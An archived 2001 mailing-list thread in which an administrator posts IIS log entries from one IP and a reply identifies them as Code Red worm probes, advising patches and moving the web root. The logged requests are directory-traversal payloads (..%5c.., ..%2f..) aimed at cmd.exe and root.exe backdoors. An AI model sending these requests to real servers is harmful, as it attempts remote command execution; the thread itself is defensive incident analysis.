I would say code red word because of all the attempts to get to cmd.exe Best practices entail applying patches and keeping the web root off the system partition. You can find a ton of info on this on SF's Focus-MS section and on MS's website at security.
Cheers, Leon -----Original Message----- From: Ryan Ratkiewicz [mailto:[EMAIL PROTECTED]] Sent: Thursday, November 15, 2001 1:18 PM To: [EMAIL PROTECTED] Subject: IIS Hack Attempt Can someone help me decipher this? 11:30:48 207.217.205.149 GET /scripts/root.exe 404 11:30:48 207.217.205.149 GET /MSADC/root.exe 404 11:30:49 207.217.205.149 GET /c/winnt/system32/cmd.exe 404 11:30:49 207.217.205.149 GET /d/winnt/system32/cmd.exe 404 11:30:49 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500 11:30:49 207.217.205.149 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 11:30:50 207.217.205.149 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 11:30:50 207.217.205.149 GET /msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe 500 11:30:50 207.217.205.149 GET /scripts/..� ../winnt/system32/cmd.exe 500 11:30:50 207.217.205.149 GET /scripts/winnt/system32/cmd.exe 404 11:30:51 207.217.205.149 GET /winnt/system32/cmd.exe 404 11:30:51 207.217.205.149 GET /winnt/system32/cmd.exe 404 11:30:51 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500 11:30:51 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500 11:30:52 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500 11:30:52 207.217.205.149 GET /scripts/..%2f../winnt/system32/cmd.exe 500 Thanks.
